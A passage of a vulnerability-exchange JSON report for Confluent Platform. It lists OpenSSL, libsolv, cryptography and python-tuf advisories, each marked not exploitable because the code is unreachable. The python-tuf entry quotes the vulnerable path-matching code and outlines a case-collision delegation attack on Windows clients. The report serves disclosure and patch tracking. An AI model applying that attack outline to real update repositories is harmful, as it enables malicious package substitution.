          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-q98x-73c3-57gj"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/05b066366842f930fadd9a6e94df98030af431bb"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3d8d5bc1056b2f62da9fede23fedbf47e85187b0"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/715349a1d7c6db970e6815dafb90915f07307f98"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/77bf00ab13f6ff5e516535432f0328ed70ec0c26"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eecbe330977e8d023aae1ca2d9bdbe983ef3fdc6"
        },
        {
          "url": "https://github.com/openssl/security/commit/05b066366842f930fadd9a6e94df98030af431bb"
        },
        {
          "url": "https://github.com/openssl/security/commit/3d8d5bc1056b2f62da9fede23fedbf47e85187b0"
        },
        {
          "url": "https://github.com/openssl/security/commit/715349a1d7c6db970e6815dafb90915f07307f98"
        },
        {
          "url": "https://github.com/openssl/security/commit/77bf00ab13f6ff5e516535432f0328ed70ec0c26"
        },
        {
          "url": "https://github.com/openssl/security/commit/eecbe330977e8d023aae1ca2d9bdbe983ef3fdc6"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9076.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9076"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9076"
        }
      ],
      "published": "2026-06-09T17:17:50+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9149",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:21333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9149"
        },
        {
          "url": "https://bugzilla.redhat.com/2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/2460425"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48864"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9149"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9150"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28236.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28236"
        },
        {
          "url": "https://github.com/openSUSE/libsolv/pull/617"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9149.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28236.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9149"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9149"
        }
      ],
      "published": "2026-05-21T00:16:35+00:00",
      "updated": "2026-07-31T18:17:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.7.20-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "GHSA-537c-gmf6-5ccf",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in wheels prior to cryptograph 48.01 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20260609.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.",
      "recommendation": "Upgrade cryptography to version 48.0.1",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        }
      ],
      "published": "2026-06-15T20:12:27+00:00",
      "updated": "2026-06-15T20:12:27+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the flaw is the OpenSSL bundled inside the Python cryptography wheel; the product does not process attacker-controlled cryptographic input through that Python path, so the vulnerable code is not reachable."
      }
    },
    {
      "id": "GHSA-qp9x-wp8f-qgjj",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "description": "`DelegatedRole._is_target_in_pathpattern` uses `fnmatch.fnmatch` to decide whether a given target path is authorized by a delegation's glob pattern.\n\nPython's `fnmatch.fnmatch` calls `os.path.normcase()` on both arguments before matching. On POSIX hosts `normcase` is the identity function; on Windows hosts `os.path` resolves to `ntpath`, whose `normcase` lowercases its input and replaces `/` with `\\`.\n\nAs a result, python-tuf's delegation *path pattern* matching is case-sensitive on Linux/macOS but case-INSENSITIVE on Windows. This makes the authorization decision for a target dependent on the host operating system of the client running the updater.\n\nThe result on Windows is a TUF specification violation in the python-tuf `ngclient` implementation.\n\n## Vulnerable code\n\n`tuf/api/_payload.py` (HEAD `7ecb67d`):\n\n```python\n1183  @staticmethod\n1184  def _is_target_in_pathpattern(targetpath: str, pathpattern: str) -> bool:\n1185      \"\"\"Determine whether ``targetpath`` matches the ``pathpattern``.\"\"\"\n1186      # We need to make sure that targetpath and pathpattern are pointing to\n1187      # the same directory as fnmatch doesn't threat \"/\" as a special symbol.\n1188      target_parts = targetpath.split(\"/\")\n1189      pattern_parts = pathpattern.split(\"/\")\n1190      if len(target_parts) != len(pattern_parts):\n1191          return False\n1192\n1193      # Every part in the pathpattern could include a glob pattern, that's why\n1194      # each of the target and pathpattern parts should match.\n1195      for target, pattern in zip(target_parts, pattern_parts, strict=True):\n1196          if not fnmatch.fnmatch(target, pattern):\n1197              return False\n1198      return True\n```\n\n`fnmatch.fnmatch` source (Python 3.12, unchanged in current mainline):\n\n```python\ndef fnmatch(name, pat):\n    ...\n    name = os.path.normcase(name)\n    pat = os.path.normcase(pat)\n    return fnmatchcase(name, pat)\n```\n\n## Fix\n\nReplace `fnmatch.fnmatch` with `fnmatch.fnmatchcase`, which is explicitly documented as \"not applying case normalization\", so it behaves identically across platforms.\n\n## Attack\n\n1. A TUF repository with two path-based delegations whose patterns differ only in case \u2014 for example, `Foo/*` and `foo/*`.\n2. The \"attacker\" delegation is listed BEFORE the \"legit\" delegation in the delegation order.\n3. The client searches for `foo/something`: on Windows, it will find the \"attacker\" provided target \"Foo/something\".\n\n\n## Exploitability caveats \n\n* The attack needs a repository configuration with case-colliding delegation path patterns. The attacker must control one of the delegated roles.\n* Delegation ordering matters: the attacker-controlled role must be visited BEFORE the legit role in the pre-order walk.\n* The client must run on Windows. No effect on Linux/macOS.\n\n## Credit\n\nReporter: Koda Reef @kodareef5 \nAdvisory edits: Jussi Kukkonen @jku",
      "recommendation": "Upgrade tuf to version 7.0.0",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-qp9x-wp8f-qgjj"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/releases/tag/v7.0.0"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-qp9x-wp8f-qgjj"
        }
      ],
      "published": "2026-05-28T22:46:13+00:00",
      "updated": "2026-05-28T22:46:13+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/tuf@6.0.0",
          "versions": [
            {
              "version": "6.0.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/tuf@6.0.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. python-tuf is not used to verify attacker-controlled update metadata in the product runtime, so the delegation path-matching flaw is not reachable."
      }
    },
    {
      "id": "CVE-2026-33818",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
